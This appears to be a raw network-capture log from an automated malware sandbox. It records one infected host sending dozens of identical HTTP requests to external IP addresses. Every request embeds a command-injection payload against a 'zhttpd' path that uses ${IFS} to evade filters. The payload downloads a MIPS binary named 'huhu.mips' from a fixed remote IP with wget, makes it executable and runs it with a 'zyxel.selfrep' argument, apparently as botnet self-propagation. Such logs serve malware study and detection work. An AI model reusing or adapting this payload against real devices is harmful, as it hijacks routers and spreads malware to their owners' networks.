                                                        Feb 2, 2024 06:21:16.047837019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6023192.168.2.143338258.216.219.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047871113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6024192.168.2.1456804162.214.166.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047925949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6025192.168.2.1445760139.162.77.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047969103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6026192.168.2.1460362149.218.84.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048005104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6027192.168.2.1448326179.140.199.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048033953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6028192.168.2.1458896156.53.18.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048079967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6029192.168.2.1442556111.237.26.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048113108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6030192.168.2.144906612.233.129.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048166990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6031192.168.2.1446556137.160.39.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048206091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6032192.168.2.144899243.226.81.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048266888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6033192.168.2.1460420119.253.165.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.048299074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6034192.168.2.1443570161.81.167.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064095020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6035192.168.2.143961897.238.156.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064152002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6036192.168.2.144083427.229.145.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064191103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6037192.168.2.143660660.196.219.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064210892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6038192.168.2.144131013.16.0.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064273119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6039192.168.2.1453050130.35.34.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064332008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6040192.168.2.144361896.135.235.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064342976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6041192.168.2.1447774128.220.102.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064383030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6042192.168.2.143628091.15.200.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064435959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6043192.168.2.143348418.100.197.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064475060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6044192.168.2.1446694129.137.220.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064521074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6045192.168.2.143618699.49.194.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064558983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6046192.168.2.1447762103.255.34.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064598083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6047192.168.2.144401061.67.14.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064640999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6048192.168.2.1458678159.248.216.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064676046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6049192.168.2.1439064123.184.247.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064723969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6050192.168.2.1447772140.39.117.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064759016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6051192.168.2.1443046203.25.124.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064790010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6052192.168.2.1433750129.95.113.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064821959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6053192.168.2.1451712205.239.230.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064882040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6054192.168.2.145942883.238.115.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064908028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6055192.168.2.1444598112.21.211.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064970016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6056192.168.2.145173813.18.49.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.064994097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6057192.168.2.1450196192.163.23.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065032959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6058192.168.2.1451580128.188.230.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065068007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6059192.168.2.145896643.229.207.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065124989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6060192.168.2.144725485.8.175.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065164089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6061192.168.2.145028874.144.231.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065200090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6062192.168.2.1450548154.35.115.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065232038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6063192.168.2.1448572211.147.87.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065288067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6064192.168.2.145366817.38.127.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065315008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6065192.168.2.1438718208.170.146.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065362930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6066192.168.2.1449758101.126.175.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065416098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6067192.168.2.1445284182.111.109.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065464973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6068192.168.2.1434092145.0.115.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065515995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6069192.168.2.14347401.138.47.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065545082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6070192.168.2.1459862111.26.245.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065594912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6071192.168.2.1440654159.120.204.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065628052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6072192.168.2.14462788.53.201.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065669060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6073192.168.2.145601292.150.44.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065706015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6074192.168.2.1450506120.71.106.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065741062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6075192.168.2.1441892166.247.202.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065785885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6076192.168.2.1432776162.189.172.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065828085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6077192.168.2.144985653.209.106.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065864086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6078192.168.2.143428686.89.181.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065915108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6079192.168.2.144770272.192.88.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065932989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6080192.168.2.1444442115.228.131.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.065979958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6081192.168.2.1438026152.99.13.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066005945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6082192.168.2.1460958197.165.22.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066051006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6083192.168.2.144203638.244.183.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066095114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6084192.168.2.1438704199.143.190.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066132069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6085192.168.2.1450310205.202.4.52443
                                                        TimestampBytes transferredDirectionData
